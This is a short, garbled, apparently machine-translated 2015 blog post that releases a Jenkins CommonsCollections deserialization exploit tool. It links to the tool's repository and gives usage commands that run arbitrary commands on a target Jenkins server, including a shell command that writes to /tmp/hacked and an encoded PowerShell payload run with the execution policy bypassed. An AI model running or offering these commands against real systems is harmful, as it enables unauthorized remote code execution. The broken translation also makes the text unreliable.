Bo Master url:http://tools.changesec.com/jenkins-commoncollections-exploit/
Submit the vulnerability is always to prove the vulnerability harm, the Java code written by the foreigner has a bug, so you get rid of
Click here to download the code, or use the following command
git clone https://github.com/CaledoniaProject/jenkins-cli-exploit.git
Let's take a picture.
How to use the tool,
If the target is Linux, MAC machine, please use,
./client.pl--url http://127.0.0.1:8080/jenkins/--os linux--cmd ' {whoami; ls-lh;} >/tmp/hacked '
If it is a Windows machine,
./client.pl--url http://127.0.0.1:8080/jenkins/--os win--cmd ' Powershell-ep bypass-enc xxxxx '
Environmental requirements,
- Make sure that you have installed Java, Perl
- Make sure that you have the Ipc::run Perl module installed, and the installation method is
cpan IPC::Run
Written in November 15, 2015
Go Jenkins commoncollections Perfect Use (Demo) tool